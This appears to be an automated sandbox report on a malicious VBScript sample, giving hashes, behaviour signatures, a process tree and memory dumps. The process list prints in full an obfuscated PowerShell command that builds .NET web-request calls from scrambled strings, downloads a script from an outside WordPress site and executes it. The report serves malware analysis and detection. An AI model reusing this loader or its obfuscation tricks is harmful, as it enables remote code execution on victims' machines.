Analysis

  • max time kernel
    4294181s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20220311-en
  • submitted
    12-04-2022 18:38

General

  • Target

    AFKCVLKLDDLZAVUPDONGW.vbs

  • Size

    2KB

  • MD5

    24ad735b3a8d200c611b18b836acaf53

  • SHA1

    96bb5edf6154e46eb01a56a31b512790d293e367

  • SHA256

    bbcb131bea858c4fb62a325f5bc4788e3ca18e790c6dd698ee6c6e870ea45636

  • SHA512

    27b271bad8bed68d9a3b6ea986b7450f22a4c09831f4cb9a5588eada8246fa19695e82848a92087ba5564f6f3787d097dc91330df103deca64886f82bbbc7a65

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AFKCVLKLDDLZAVUPDONGW.vbs"
    1⤵
      PID:596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $FTCKPRWRCANOIWXIDCVVNS = '[S\$3+0%!#70%*4{^]6\16]2EM.I@}%$%})<_{3+#![-&9^$##MREAdER]'.Replace('\$3+0%!#70%*4{^]6\16]2','ySt').Replace('@}%$%})<_{3+#![-&9^$##','O.StREA');$OPDAXIYFOCWNKVANDBYRRQ = ($FTCKPRWRCANOIWXIDCVVNS -Join '')| .('{1}{0}'-f'EX','I');$ICTZSOZQNDQVCJZDIABYPE = '[SyS93!=@^*/[*782[\$\-%={%T.W8(11[8<6/]5*868{9{#+06ST]'.Replace('93!=@^*/[*782[\$\-%={%','TEm.NE').Replace('8(11[8<6/]5*868{9{#+06','EbREquE');$IOGBGSTBSXHOWZHWGCXIVP = ($ICTZSOZQNDQVCJZDIABYPE -Join '')| .('{1}{0}'-f'EX','I');$BGWUTNDKYVDYGXTZZWXWNT = 'Cr)4-$<1^%^=*^55-/_636[2TE'.Replace(')4-$<1^%^=*^55-/_636[2','Ea');$OJLQEURWLWYVLQCIHYUUFD = 'GE5={{-]1==#)-+8=5%64%&}onSE'.Replace('5={{-]1==#)-+8=5%64%&}','tRESp');$SCYACXEAKXLAYHCTCLITJG = 'GE<-4[5]9+9}2/}{\7(9*!07REam'.Replace('<-4[5]9+9}2/}{\7(9*!07','tRESponSESt');$QSPTVKHFZAGSXGZPPOBDFP = 'RE262]_&$84<]*&!={=&-1%)nD'.Replace('262]_&$84<]*&!={=&-1%)','aDToE'); .('{1}{0}'-f'EX','I')($OPDAXIYFOCWNKVANDBYRRQ::new($IOGBGSTBSXHOWZHWGCXIVP::$BGWUTNDKYVDYGXTZZWXWNT('https://linkvilleplayers.org/wp-admin/Server.txt').$OJLQEURWLWYVLQCIHYUUFD().$SCYACXEAKXLAYHCTCLITJG()).$QSPTVKHFZAGSXGZPPOBDFP())
      1⤵
      • Process spawned unexpected child process
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1236

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1236-54-0x000007FEFB901000-0x000007FEFB903000-memory.dmp
      Filesize

      8KB

    • memory/1236-55-0x0000000002830000-0x0000000002832000-memory.dmp
      Filesize

      8KB

    • memory/1236-57-0x0000000002834000-0x0000000002837000-memory.dmp
      Filesize

      12KB

    • memory/1236-58-0x0000000002832000-0x0000000002834000-memory.dmp
      Filesize

      8KB

    • memory/1236-56-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp
      Filesize

      11.4MB

    • memory/1236-59-0x000000001B860000-0x000000001BB5F000-memory.dmp
      Filesize

      3.0MB

    • memory/1236-60-0x000000000283B000-0x000000000285A000-memory.dmp
      Filesize

      124KB